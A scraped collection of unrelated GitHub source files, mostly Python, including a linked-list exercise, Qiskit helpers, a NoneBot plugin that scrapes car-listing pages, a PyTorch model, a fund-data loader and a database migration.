the end of the list\r\n def append(self, v):\r\n if self.isEmpty():\r\n self.head = Node(v)\r\n return\r\n temp = self.head\r\n while (temp.next != None):\r\n temp = temp.next\r\n temp.next = Node(v)\r\n return\r\n\r\n #method to insert a node at the front of the list\r\n def addFront(self, v):\r\n new_node = Node(v)\r\n new_node.next = self.head\r\n self.head = new_node\r\n return\r\n\r\n #method to delete a node with a given value v\r\n def delete(self, v):\r\n if self.isEmpty():\r\n return\r\n temp = self.head\r\n if temp.value == v:\r\n self.head = temp.next\r\n temp = None\r\n return\r\n else:\r\n while temp.next != None:\r\n if temp.value == v:\r\n break\r\n temp = temp.next\r\n if temp.next == None:\r\n return\r\n temp.value = None\r\n if temp.next != None:\r\n temp.value = temp.next.value\r\n temp.next = temp.next.next\r\n\r\n #method to add a node at a specified position\r\n def addNode(self, v, pos):\r\n if pos == 1:\r\n addFront(v)\r\n return\r\n new_node = Node(v)\r\n temp = self.head\r\n i = 1\r\n while (temp != None) and (i < pos-1):\r\n temp = temp.next\r\n i += 1\r\n if temp == None:\r\n return\r\n new_node.next = temp.next\r\n temp.next = new_node\r\n \r\n #method to display the linked list\r\n def display(self):\r\n temp = self.head\r\n if self.isEmpty():\r\n print(\"List is Empty\")\r\n return\r\n while (temp.next != None):\r\n print(temp.value, end = \" -> \")\r\n temp = temp.next\r\n print(temp.value)\r\n \r\nn = LinkedList()\r\nn.addFront(5)\r\nn.addFront(7)\r\nn.addFront(3)\r\nn.append(6)\r\nprint(\"Linked List is : \")\r\nn.display()\r\nn.delete(7)\r\nprint(\"\\nLinked List after deleting Node with value 7 : \")\r\nn.display()\r\nn.addNode(10,2)\r\nprint(\"\\nLinked List after adding a Node with value 10 at position 2 : \")\r\nn.display()","repo_name":"gunjannayak2k20/hacktoberfest-2021-accepted","sub_path":"DSA in python/linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"24166773698","text":"# 测试读取文件 输入输出\n\nimport model\n\n\ndef getGisasList():\n with open('./file/gaiadr2_12arcmin_r_ad.txt', mode='r') as file:\n gais_list = []\n while True:\n content = file.readline().split()\n if not content:\n break\n # 非空才进行转换,否则可能读到最后一行空字符的情况\n gais_info = model.GaiaStarInformation(\n content[0], float(content[1]), float(content[2]), float(content[3]), float(content[4]), float(content[5]), float(content[6]), float(content[7]))\n gais_list.append(gais_info)\n return gais_list\n\n\ndef getInputStarList():\n with open('./file/inputstar129.txt', mode='r') as file:\n input_list = []\n while True:\n content = file.readline().split()\n if not content:\n break\n # 非空才进行转换,否则可能读到最后一行空字符的情况\n inputstar = model.InputStar(\n float(content[0]), float(content[1]))\n input_list.append(inputstar)\n print(inputstar)\n return input_list\n\n\n# getInputStarList()\n","repo_name":"msclam/CodeRepo","sub_path":"StarProgram/python/六常数匹配/star/deal.py","file_name":"deal.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39656557571","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 5 22:37:39 2021\n\n@author: Fidel\n\"\"\"\n\n# Standard libraries\nfrom numpy import array, kron\n\n# Qiskit libraries\nfrom qiskit import IBMQ\nfrom qiskit_ibm_provider import IBMProvider\nimport mthree\n\n#from token import tokenid\nfrom tokenid import tokenid \n\n#try:\n# import token.token\n#except:\n #token = \n# pass\n\n# IBM Quantum account utils\n\n#def startup(check=False, token=tokenid, hub='ibm-q-melbourne', group=None, project=None):\n# \n\ndef startup(check=False, token=tokenid, hub='ibm-q-melbourne', group=None, project=None):\n \"\"\"Start up session\"\"\"\n \n try:\n provider = IBMProvider()\n except:\n IBMProvider.save_account(token=tokenid)\n provider = IBMProvider()\n print(\"Account enabled\")\n \n if check:\n check_provider(hub)\n \n return provider\n \ndef check_provider(hub='ibm-q-melbourne'):\n \"\"\"Check list of providers with queue size and qubit count for input hub\"\"\"\n provider = IBMProvider()\n \n for backend in provider.backends():\n try:\n qubit_count = len(backend.properties().qubits)\n except:\n qubit_count = 'simulated'\n print(f'{backend.name()} has {backend.status().pending_jobs} queud and {qubit_count} qubits')\n \n \n# Math objects\n\npauli = {'I': array([[1, 0], [0, 1]], dtype=complex),\n 'X': array([[0, 1], [1, 0]], dtype=complex),\n 'Y': array([[0, -1j], [1j, 0]], dtype=complex),\n 'Z': array([[1, 0], [0, -1]], dtype=complex)}\n\n\n# Math functions\n\ndef bit_str_list(n):\n \"\"\"Create list of all n-bit binary strings\"\"\"\n return [format(i, 'b').zfill(n) for i in range(2**n)]\n \ndef pauli_n(basis_str):\n \"\"\"Calculate kronecker tensor product sum of basis from basis string\"\"\"\n \n M = pauli[basis_str[0]]\n try:\n for basis in basis_str[1:]:\n M_new = kron(M, pauli[basis])\n M = M_new\n except: pass # Single basis case\n \n return M \n\n# Run and load mthree calibrations\ndef run_cal(backend, initial_layout, filename=None):\n mit = mthree.M3Mitigation(backend)\n mit.cals_from_system(initial_layout, shots=8192)\n if filename is None:\n filename = f'calibrations/{backend.name()}_cal.json'\n mit.cals_to_file(filename)\n \n return mit\n \ndef load_cal(backend=None, filename=None):\n mit = mthree.M3Mitigation()\n if filename is None:\n filename = f'calibrations/{backend.name()}_cal.json'\n mit.cals_from_file(filename)\n \n return mit\n\ndef list_retrieve_jobs(job_ids):\n for i, job_id in enumerate(job_ids):\n print(f'job{i+1} = provider.backend.retrieve_job(\\'{job_id}\\')')\n \n\n ","repo_name":"jkfids/qiskit-entangle","sub_path":"code/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27946452165","text":"import lxml.etree\nfrom pathlib import Path\nfrom typing import Dict, List\nfrom nonebot import on_command\nfrom nonebot.adapters.onebot.v11 import GROUP\nfrom services import logger\nfrom nonebot_plugin_htmlrender import template_to_pic\nfrom utils.http_utils import AsyncHttpx\nfrom utils.message_builder import image\n\n__plugin_name__ = \"烧烤推车查询\"\n__plugin_type__ = \"烧烤相关&uni移植\"\n__plugin_version__ = 0.1\n__plugin_usage__ = f\"\"\"\nusage:\n 获取烧烤最近的推车,私聊可用\n 限制每人1分钟只能使用2次\n 指令:\n ycm/车来/有车吗/推车\n 两个好用的烧烤推车网站:\n 城城的推车Station:http://59.110.175.37:5000/\n 纹月的推车Station:http://1.117.147.194:8459/\n\"\"\".strip()\n__plugin_settings__ = {\n \"default_status\": False,\n \"cmd\": [\"烧烤推车查询\", \"ycm\", \"烧烤相关\", \"uni移植\"],\n}\n__plugin_block_limit__ = {\"rst\": \"别急,正在寻找推车中\",}\n__plugin_cd_limit__ = {\n \"cd\": 60,\n \"limit_type\": \"user\",\n \"count_limit\": 2,\n \"rst\": \"别急,[cd]s后再用!\"\n}\n\n# pjsk查推车\nycm = on_command('ycm', aliases={\"车来\", \"有车吗\", \"推车\"}, priority=5, block=True)\n\n\n@ycm.handle()\nasync def _():\n await ycm.send('请稍后,正在获取推车中...', at_sender=True)\n cars = await get_cars_wy()\n if not cars:\n cars = await get_cars_cc()\n try:\n pic = await render_reply(cars)\n await ycm.send(image(pic))\n except Exception as e:\n logger.warning(f\"生成网页图片发生错误: {e}\")\n await ycm.finish(\n \"出错了,建议直接戳网址:\\n\"\n \"http://1.117.147.194:8459/\\n\"\n \"http://59.110.175.37:5000/\"\n )\n\n\nasync def get_cars_wy() -> List:\n try:\n url = 'http://1.117.147.194:8459/'\n html = (await AsyncHttpx.get(url, timeout=4)).text\n xp = '/html/body//div[@class=\"item\"]'\n trees = lxml.etree.HTML(html).xpath(xp)\n car = {}\n cars = []\n for tree in trees:\n car['room'] = tree.xpath('./h3/text()')[0]\n car['des'] = '\\n'.join(tree.xpath('./div/text()'))\n car['time'] = tree.xpath('./h5/text()')[0]\n cars.append(car.copy())\n except Exception as e:\n logger.warning(f\"获取纹月推车发生错误: {e}\")\n return []\n else:\n return cars\n\n\nasync def get_cars_cc() -> List:\n try:\n url = 'http://59.110.175.37:5000/'\n # 获取车站数据\n html = (await AsyncHttpx.get(url, timeout=4)).text\n # 解析数据\n tree = lxml.etree.HTML(html)\n xp = '/html/body/div/table//td/text()'\n result = tree.xpath(xp)\n # 重新封装数据,制作网页截图\n car = {}\n cars = []\n for index, each in enumerate(result):\n if index % 4 == 0:\n pass\n elif index % 4 == 1:\n car['room'] = each\n elif index % 4 == 2:\n car['des'] = each\n elif index % 4 == 3:\n car['time'] = each\n cars.append(car.copy())\n car.clear()\n except Exception as e:\n logger.warning(f\"获取城城推车发生错误: {e}\")\n return []\n else:\n return cars\n\n\nasync def render_reply(cars: List[Dict[str, str]]) -> bytes:\n if not cars:\n raise Exception('没有找到车!建议检查网页结构是否变化')\n template_path = str(Path(__file__).parent / \"templates\")\n template_name = \"ycm.html\"\n return await template_to_pic(\n template_path=template_path,\n template_name=template_name,\n templates={\"cars\": cars},\n pages={\n \"viewport\": {\"width\": 1180, \"height\": 300},\n \"base_url\": f\"file://{template_path}\",\n },\n wait=0,\n )\n","repo_name":"cYanosora/kndbot","sub_path":"plugins/pjsk/ycm/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"14416282276","text":"import pytorch_lightning as pl\nimport torch\nfrom torch import nn\nfrom torch.nn import BCELoss, BCEWithLogitsLoss\nfrom torchmetrics import Accuracy, Recall, Precision\nfrom torchmetrics.functional import f1_score\n\n\nclass Model(pl.LightningModule):\n \n def __init__(self,\n use_cpu: bool = False,\n learning_rate: float = 0.001, # 1e-5\n input_size: int = 43,\n hidden_size: int = 10,\n output_size: int = 1,\n dropout_rate: float = 0.0\n ):\n super().__init__()\n self.save_hyperparameters()\n\n # Architecture layers\n self.input_size = input_size\n self.l1 = nn.Linear(input_size, hidden_size)\n self.relu = nn.ReLU()\n self.l2 = nn.Linear(hidden_size, output_size)\n self.dropout = nn.Dropout(p=dropout_rate) if dropout_rate and dropout_rate else None\n\n\n self.learning_rate = learning_rate\n self.fold_number: int = 0\n\n self.all_validation_ys = torch.empty(0, dtype=torch.float32)\n self.all_validation_y_hats = torch.empty(0, dtype=torch.float32)\n self.gpu_used = not use_cpu and torch.cuda.is_available()\n if self.gpu_used:\n self.all_validation_ys = self.all_validation_ys.cuda()\n self.all_validation_y_hats = self.all_validation_y_hats.cuda()\n\n self.train_acc = Accuracy(\"binary\")\n self.val_acc = Accuracy(\"binary\")\n self.val_recall = Recall(\"binary\")\n self.val_precision = Precision(\"binary\")\n\n self.criterion = BCEWithLogitsLoss()\n\n def forward(self, x):\n out = self.l1(x)\n out = self.relu(out)\n out = self.l2(out)\n if self.dropout:\n out = self.dropout(out)\n # no activation and no softmax at the end\n return out\n\n def set_fold(self, fold_number):\n self.fold_number = fold_number\n\n def validation_epoch_end(self, outputs):\n # Save all validation outputs for metrics logging in callbacks\n ys = [batch_result[0] for batch_result in outputs]\n y_hats = [batch_result[1] for batch_result in outputs]\n self.all_validation_ys = torch.cat(ys).view(-1)\n self.all_validation_y_hats = torch.cat(y_hats).view(-1)\n\n def configure_optimizers(self):\n return torch.optim.Adam(self.parameters(), lr=self.learning_rate)\n\n def training_step(self, batch, batch_idx):\n x, y = batch.values()\n y_hat = self(x)\n loss = self.criterion(y_hat, y.view(-1,1))\n # self.log_train_metrics(y, y_hat) # Uncomment for debugging\n self.log(f'fold_{self.fold_number}_loss/training', loss, on_step=False, on_epoch=True)\n return loss\n\n def log_train_metrics(self, y, y_hat):\n # We log these metrics mostly to see that the training is going alright\n train_acc = self.train_acc(y_hat, y.int())\n train_f1_score = f1_score(y_hat, y.int())\n self.log(f'fold_{self.fold_number}_metrics/train_acc', train_acc, on_step=True, on_epoch=True)\n self.log(f'fold_{self.fold_number}_metrics/train_f1_score', train_f1_score)\n\n def validation_step(self, batch, batch_idx):\n x, y = batch.values()\n y_hat = self(x)\n loss = self.criterion(y_hat, y.view(-1,1))\n self.log(f'fold_{self.fold_number}_loss/validation', loss)\n return y, y_hat\n","repo_name":"mwaehner/redes-sociedad-economia-tp-final","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3695330319","text":"import pandas as pd\nimport numpy as np\nimport timeit\nimport os\n\nclass Load:\n def __init__(self, db_path, fund_names, min_days, max_missing_days):\n self._fund_names = fund_names\n self._path = db_path\n self._min_days = min_days\n self._max_missing_days = max_missing_days\n\n def _read_file(self, path, fund_name):\n filename = \"{0}.csv\".format(fund_name)\n filepath = os.path.join(path, filename)\n\n # Workaround for bug #15086\n filehandle = open(filepath, \"r\")\n df = pd.read_csv(filehandle, \n names=[\"date\", \"nav\", \"id\"], \n usecols=[1, 2, 3],\n skiprows=1)\n\n return df\n\n def _set_index_date(self, df):\n # convert text string to pandas datetimestamp\n df['date'] = pd.to_datetime(df['date'])\n # use as index\n df = df.set_index(\"date\")\n\n return df\n\n def _reindex_using_business_days(self, df):\n # reindex using business days\n start = df.first_valid_index()\n end = df.last_valid_index()\n range = pd.date_range(start, end, freq='B')\n df = df.reindex(range)\n # now check nbr of missing days in a row\n self._check_na_days(df)\n\n return df\n\n class TooManyMissingDays(Exception):\n pass\n\n def _check_na_days(self, df):\n row_status = df.isnull().nav\n only_nulls = row_status[row_status == True].index\n if len(only_nulls) == 0:\n return\n\n start_date = pd.Timestamp(only_nulls[0], freq=\"B\")\n nbr_missing_days = 0\n\n for date in only_nulls:\n if start_date == date:\n start_date = start_date + start_date.freq\n nbr_missing_days += 1\n else:\n start_date = pd.Timestamp(date, freq=\"B\")\n nbr_missing_days = 1\n\n if nbr_missing_days >= self._max_missing_days:\n raise Load.TooManyMissingDays()\n\n def _fill_na_days(self, df):\n df = df.fillna(method=\"ffill\")\n return df\n\n def _remove_duplicates(self, df):\n df = df[~df.index.duplicated()]\n return df\n\n def _remove_zero_values(self, df):\n df = df[df.nav != 0]\n return df\n\n def _add_fund(self, funds, df, fund_name):\n df.name = fund_name \n funds[fund_name] = df\n\n def _adjust_fund_remake(self, df):\n contains_id_nbr = df.id.apply(lambda x: np.isreal(x)).all()\n if not contains_id_nbr:\n return\n\n # Detect if Id is changed i.e. fund is recreated to a new fund \n diff = df.id.diff()\n\n change = df.nav.pct_change()\n fund_remakes = diff[diff != 0]\n for index, _ in fund_remakes.iteritems():\n updated_rows = df[index:].nav / (1 + change[index])\n df.update(updated_rows)\n\n def _adjust_fund_abnormal(self, df):\n change = df.nav.pct_change()\n # Detect if change in fund is more than 10% interday\n abnormal_change = change[abs(change) > 0.1]\n for date_index, percent_change in abnormal_change.iteritems():\n updated_rows = df[date_index:].nav / (1 + percent_change)\n df.update(updated_rows)\n\n def _do_operations_on_dataset(self, df):\n df = self._set_index_date(df)\n df = self._remove_duplicates(df)\n df = self._reindex_using_business_days(df)\n df = self._fill_na_days(df)\n df = self._remove_zero_values(df)\n self._adjust_fund_remake(df)\n self._adjust_fund_abnormal(df)\n\n return df\n\n class NotEnoughNbrDays(Exception):\n pass\n\n def _check_min_days(self, df):\n height, _ = df.shape\n if height < self._min_days:\n raise Load.NotEnoughNbrDays()\n\n def _load_single_fund(self, fund_name):\n df = self._read_file(self._path, fund_name) \n df = self._do_operations_on_dataset(df)\n self._check_min_days(df)\n\n return df\n\n def execute(self):\n funds = {}\n\n for fund_name in self._fund_names:\n try:\n #print(\"Loading {}\".format(fund_name))\n df = self._load_single_fund(fund_name)\n self._add_fund(funds, df, fund_name)\n except Load.NotEnoughNbrDays:\n print(\"{}: not enough number of days\".format(fund_name))\n except Load.TooManyMissingDays:\n print(\"{}: too many missing days in a row\".format(fund_name))\n \n return funds","repo_name":"engelvinter/Xtrend","sub_path":"seb/load/Load.py","file_name":"Load.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27752581358","text":"import sys\r\ninputF = sys.stdin.readline\r\n\r\nn = int(inputF())\r\ndp = [[0, 0, 0] for _ in range(n)]\r\nhouse = [list(map(int, inputF().split())) for _ in range(n)]\r\n\r\nfor i in range(n):\r\n if i == 0:\r\n dp[0][0] = house[i][0]\r\n dp[0][1] = house[i][1]\r\n dp[0][2] = house[i][2]\r\n else:\r\n dp[i][0] = house[i][0] + min(dp[i-1][1], dp[i-1][2])\r\n\r\n dp[i][1] = house[i][1] + min(dp[i - 1][0], dp[i - 1][2])\r\n\r\n dp[i][2] = house[i][2] + min(dp[i - 1][0], dp[i - 1][1])\r\n\r\nprint(min(dp[n-1]))","repo_name":"nube-net/baekjoon-nube-net-gytjdttop-","sub_path":"백준/Silver/1149. RGB거리/RGB거리.py","file_name":"RGB거리.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12037531232","text":"\"\"\"Add full alerts support\n\nRevision ID: 2bbd670f53b4\nRevises: 08ce9c5194a4\nCreate Date: 2020-05-15 09:36:44.069109\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"2bbd670f53b4\"\ndown_revision = \"08ce9c5194a4\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table(\n \"alert_active_period\",\n sa.Column(\"pk\", sa.Integer(), nullable=False),\n sa.Column(\"alert_pk\", sa.Integer(), nullable=False),\n sa.Column(\"starts_at\", sa.TIMESTAMP(timezone=True), nullable=True),\n sa.Column(\"ends_at\", sa.TIMESTAMP(timezone=True), nullable=True),\n sa.ForeignKeyConstraint(\n [\"alert_pk\"],\n [\"alert.pk\"],\n ),\n sa.PrimaryKeyConstraint(\"pk\"),\n )\n op.create_index(\n op.f(\"ix_alert_active_period_alert_pk\"),\n \"alert_active_period\",\n [\"alert_pk\"],\n unique=False,\n )\n op.create_table(\n \"alert_message\",\n sa.Column(\"pk\", sa.Integer(), nullable=False),\n sa.Column(\"alert_pk\", sa.Integer(), nullable=False),\n sa.Column(\"header\", sa.String(), nullable=False),\n sa.Column(\"description\", sa.String(), nullable=False),\n sa.Column(\"url\", sa.String(), nullable=True),\n sa.Column(\"language\", sa.String(), nullable=True),\n sa.ForeignKeyConstraint(\n [\"alert_pk\"],\n [\"alert.pk\"],\n ),\n sa.PrimaryKeyConstraint(\"pk\"),\n )\n op.create_index(\n op.f(\"ix_alert_message_alert_pk\"), \"alert_message\", [\"alert_pk\"], unique=False\n )\n op.create_table(\n \"alert_stop\",\n sa.Column(\"alert_pk\", sa.Integer(), nullable=True),\n sa.Column(\"stop_pk\", sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(\n [\"alert_pk\"],\n [\"alert.pk\"],\n ),\n sa.ForeignKeyConstraint(\n [\"stop_pk\"],\n [\"stop.pk\"],\n ),\n )\n op.create_index(\n op.f(\"ix_alert_stop_alert_pk\"), \"alert_stop\", [\"alert_pk\"], unique=False\n )\n op.create_index(\n op.f(\"ix_alert_stop_stop_pk\"), \"alert_stop\", [\"stop_pk\"], unique=False\n )\n op.create_table(\n \"alert_trip\",\n sa.Column(\"alert_pk\", sa.Integer(), nullable=True),\n sa.Column(\"trip_pk\", sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(\n [\"alert_pk\"],\n [\"alert.pk\"],\n ),\n sa.ForeignKeyConstraint(\n [\"trip_pk\"],\n [\"trip.pk\"],\n ),\n )\n op.create_index(\n op.f(\"ix_alert_trip_alert_pk\"), \"alert_trip\", [\"alert_pk\"], unique=False\n )\n op.create_index(\n op.f(\"ix_alert_trip_trip_pk\"), \"alert_trip\", [\"trip_pk\"], unique=False\n )\n op.add_column(\n \"alert\", sa.Column(\"created_at\", sa.TIMESTAMP(timezone=True), nullable=True)\n )\n op.add_column(\"alert\", sa.Column(\"sort_order\", sa.Integer(), nullable=True))\n op.add_column(\n \"alert\", sa.Column(\"updated_at\", sa.TIMESTAMP(timezone=True), nullable=True)\n )\n op.drop_column(\"alert\", \"creation_time\")\n op.drop_column(\"alert\", \"url\")\n op.drop_column(\"alert\", \"description\")\n op.drop_column(\"alert\", \"header\")\n op.drop_column(\"alert\", \"start_time\")\n op.drop_column(\"alert\", \"end_time\")\n op.drop_column(\"alert\", \"priority\")\n op.create_index(\n op.f(\"ix_alert_agency_alert_pk\"), \"alert_agency\", [\"alert_pk\"], unique=False\n )\n op.create_index(\n op.f(\"ix_alert_route_alert_pk\"), \"alert_route\", [\"alert_pk\"], unique=False\n )\n op.alter_column(\"stop\", \"type\", existing_type=sa.VARCHAR(length=16), nullable=False)\n","repo_name":"jamespfennell/transiter-python","sub_path":"transiter/db/alembic/versions/2bbd670f53b4_add_full_alerts_support.py","file_name":"2bbd670f53b4_add_full_alerts_support.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70302818793","text":"\n\n\n\ndef prepare_output(word, greek_dict):\n reduced_def = get_word_info(dictionary, word, \"\")\n sent = []\n ant_sent = []\n vars = {}\n vars2 = set()\n cvars = set()\n output = get_output()\n for z, cls in enumerate(reduced_def):\n sentences = cls.sentences\n adjust_ant_index(ant_sent, cls, sent, sentences, vars, vars2, greek_dict)\n adjust_con_index(cls, cvars, output, sent, sentences)\n output.prop_var = get_prop_var()\n output.prop_name = defaultdict(lambda: output.prop_var.pop(), {})\n for tsent in sent:\n tsent[2] = name_sent(tsent[1], output.prop_name)\n output.oprop_name[tsent[2]] = tsent[1]\n\n output.main_var = vars\n output.all_sent = sent\n output.abbreviations = json.loads(json.dumps(dictionary.def_constants.get(word, {})))\n output.variables = get_variables()\n output.user = \"\"\n\n for k in output.abbreviations.keys(): output.variables.remove(k)\n for var in vars2 | cvars:\n if var in output.variables: output.variables.remove(var)\n\n return output, vars, reduced_def\n\n\ndef adjust_ant_index(ant_sent, cls, sent, sentences, vars, vars2, greek_dict):\n kind = dictionary.kind.get(word)\n\n for num in cls.def_stats.ant_index:\n if isinstance(num, int):\n ant_sent.append(sentences[num])\n for noun in sentences[num][42]:\n if kind in ['c', 'i', 'p'] and sentences[num][13] in [\"I\", \"J\", \"=\"] and noun == 14:\n pass\n else:\n if sentences[num][noun] not in vars.keys():\n vars.update({sentences[num][noun]: noun})\n vars2.add(sentences[num][noun])\n\n try:\n idx = findposinmd(sentences[num][0], sent, 0)\n except:\n idx = -1\n if idx == -1 and sentences[num][56] == \"c\":\n sentences[num][7] = sentences[num][56]\n sentences[num][43] = 'do not define'\n sent.append(sentences[num])\n else:\n for cnum in num:\n for noun in sentences[cnum][42]:\n vars.update({sentences[num][noun]: noun})\n vars2.add(sentences[cnum][noun])\n greek_dict[sentences[num][noun]]\n ant_sent.append(sentences[cnum])\n sentences[cnum][7] = sentences[cnum][56]\n\n\ndef adjust_con_index(cls, cvars, output, sent, sentences):\n for num in cls.def_stats.con_index:\n cons_count = 0\n if isinstance(num, int):\n sentences[num][7] = 'c'\n if sentences[num][3] == \"~\":\n dictionary.negative_definitions.add(word)\n\n sent.append(sentences[num])\n for noun in sentences[num][42]: cvars.add(sentences[num][noun])\n else:\n tnum = cls.def_stats.con_hnum[cons_count]\n embed = cls.embeds.get(tnum)\n embed.sentences = sentences\n sub_word = embed.def_stats.def_word_num\n add_to_gsent([embed], output)\n output.trans_def.update({sub_word: embed})\n cons_count += 1\n for cnum in num:\n dictionary.connected_definitions.add(word)\n if sentences[cnum][3] == \"~\":\n dictionary.negative_definitions.add(word)\n sent.append(sentences[cnum])\n for noun in sentences[cnum][42]: cvars.add(sentences[cnum][noun])\n\n\n########################\n########## perhaps delete\n\n\ndef instantiate_from_lemmas(word, greek_dict):\n output, consistent, reduced = try_instantiation(output, dictionary, \"lemmas\")\n if not consistent and proof_type == 5:\n output = rearrange(\"last\", output, consistent, \"\", output.main_var)\n print_sent([output.total_sent], [0], 2)\n print (word)\n raise Exception\n\n\ndef build_basic_definition(output, reduced, word):\n if reduced:\n list2 = dictionary.categorized_sent.get(word)\n nat_ant = list2[0].def_stats.natural_antecedent\n ant_greek = list2[0].def_stats.ant_greek\n conn = iff if list2[0].def_stats.connection_type == 'e' else conditional\n j = 0\n while output.all_sent[0][5] in ant_greek:\n j += 1\n del output.all_sent[0]\n if j > 5: raise Exception\n\n list1 = list(filter(lambda x: x[0] != 'irrelevant', output.all_sent))\n list1 = [x[0] for x in list1]\n for k, defin in output.trans_def.items():\n if \",\" in k:\n sentences = defin.sentences\n conn_sent = defin.def_stats.tot_greek_sent\n nant = adjust_sides(defin.def_stats.ant_index, output, sentences)\n ncon = adjust_sides(defin.def_stats.con_index, output, sentences)\n\n for e, sentence in enumerate(sentences):\n conn_sent = conn_sent.replace(sentence[5], sentence[0])\n\n output.lemma_embed.update({k: json.loads(json.dumps([nant, ncon]))})\n list1.append(conn_sent)\n\n basic_definition = nat_ant + \" \" + conn + \" (\" + \" & \".join(list1) + \")\"\n if output.abbreviations != {}:\n str1 = \" & \".join([build_connection(\"(\" + k, \"=\", v + \")\") for k, v in output.abbreviations.items()])\n basic_definition = build_connection(basic_definition, \" & \", str1)\n\n dictionary.basic_definitions.update({word: basic_definition})\n else:\n definition = dictionary.definitions.get(word)\n if definition != None:\n dictionary.basic_definitions.update({word: definition})\n\n\ndef print_to_excel(proof_type):\n if proof_type != 5:\n wb5 = load_workbook('/Users/kylefoley/PycharmProjects/inference_engine2/inference2/Proofs/dictionary5.xlsx')\n w5 = wb5.worksheets[4]\n row_number = 1\n for k, v in dictionary.basic_definitions.items():\n w5.cell(row=row_number, column=1).value = k\n w5.cell(row=row_number, column=2).value = v\n row_number += 1\n\n wb5.save('/Users/kylefoley/PycharmProjects/inference_engine2/inference2/Proofs/dictionary5.xlsx')\n\n\ndef generate_multiple_possibilities(power_set1, possibilities, new_sets):\n for st in power_set1:\n if len(st) > 1:\n new_sets2 = [new_sets[num] for num in st]\n possibilities2 = [i for i in itertools.product(*new_sets2)]\n for tpl in possibilities2:\n possibilities.append([possibilities[num] for num in tpl])\n\n for e, itm in enumerate(possibilities):\n if isinstance(itm, tuple):\n possibilities[e] = [possibilities[e]]\n\n return possibilities\n\n\ndef large_possibilities(xindex, yindex):\n possibilities = [xindex, yindex]\n possibilities = [i for i in itertools.product(*possibilities)]\n max_len = len(xindex) if len(xindex) >= len(yindex) else len(yindex)\n new_sets = []\n sub_sets = []\n for x in range(len(possibilities)):\n if (x + 1) % max_len == 0:\n sub_sets.append(x)\n new_sets.append(json.loads(json.dumps(sub_sets)))\n sub_sets = []\n else:\n sub_sets.append(x)\n\n power_set1 = list(powerset([x for x in range(len(new_sets))]))\n\n return generate_multiple_possibilities(power_set1, possibilities, new_sets)\n\n\ndef consistent_classes(xword, yword, lemmata):\n xclass = dictionary.groups.get(xword, {10: \"thing\", 14: \"thing\"})\n yclass = dictionary.groups.get(yword, {10: \"thing\", 14: \"thing\"})\n xindex = [k for k, y in xclass.items()]\n yindex = [k for k, y in yclass.items()]\n if len(xindex) < 3 and len(yindex) < 3:\n possibilities = [xindex, yindex]\n possibilities = [i for i in itertools.product(*possibilities)]\n else:\n possibilities = large_possibilities(xindex, yindex)\n\n consistent_classes2(xword, yword, xclass, yclass, possibilities, lemmata)\n\n\ndef consistent_classes2(xword, yword, xclass, yclass, possibilities, lemmata):\n for possibility in possibilities:\n xgroup = xclass.get(possibility[0], 'thing')\n ygroup = yclass.get(possibility[1], 'thing')\n if xgroup == ygroup:\n build_entry(xword, yword, possibility, lemmata, True)\n elif xgroup == 'thing' or ygroup == 'thing':\n build_entry(xword, yword, possibility, lemmata, True)\n else:\n list1 = [xgroup, ygroup]\n list1.sort()\n pair = \".\".join(list1)\n tvalue = dictionary.ontology[2].get(pair)\n assert tvalue != None\n if not tvalue:\n build_entry(xword, yword, possibility, lemmata, False)\n else:\n build_entry(xword, yword, possibility, lemmata, True)\n\n\ndef build_entry(xword, yword, possibility, lemmata, tvalue):\n list1 = [xword, yword]\n list1.sort()\n str1 = list1[0] + \".\" + list1[1]\n for num in possibility:\n str1 += \".\" + str(num)\n lemmata.update({str1: tvalue})\n return\n\n\ndef modify_abbreviations(youtput, xoutput, xvar, abbrev_dict):\n xabbrev = xoutput.abbreviations\n for k, v in youtput.abbreviations.items():\n if v in xabbrev.values():\n new_var = get_key(xabbrev, v)\n abbrev_dict.update({k: new_var})\n elif k not in xvar:\n new_var = xvar[0]\n abbrev_dict.update({k: new_var})\n del xvar[0]\n\n\ndef modify_variables(youtput, xoutput):\n xvars = xoutput.variables\n yvars = youtput.variables\n xprop_name = xoutput.prop_name\n xoprop_name = xoutput.oprop_name\n\n tvars = list(set(xvars) | set(yvars))\n abbrev_dict = {}\n modify_abbreviations(youtput, xoutput, xvars, abbrev_dict)\n\n for sentence in youtput.all_sent:\n changed = False\n for pos in sentence[42]:\n yvar = sentence[pos]\n value = abbrev_dict.get(yvar)\n if value != None:\n changed = True\n sentence[pos] = value\n elif yvar in youtput.main_var:\n pass\n elif yvar not in xvars:\n changed = True\n new_var = tvars[0]\n sentence[pos] = new_var\n abbrev_dict.update({yvar: new_var})\n del tvars[0]\n if changed:\n name_and_build(xoutput, sentence)\n else:\n sentence[2] = name_sent(sentence[1], xprop_name)\n xoprop_name[sentence[2]] = sentence[1]\n\n return\n\n\ndef get_basic_sent(tword):\n with open(\"basic/\" + tword + \".json\", \"r\") as fp:\n return json.load(fp)\n\n\ndef reload_sentences(output, anc):\n for k, v in output.trans_def.items():\n list2 = []\n 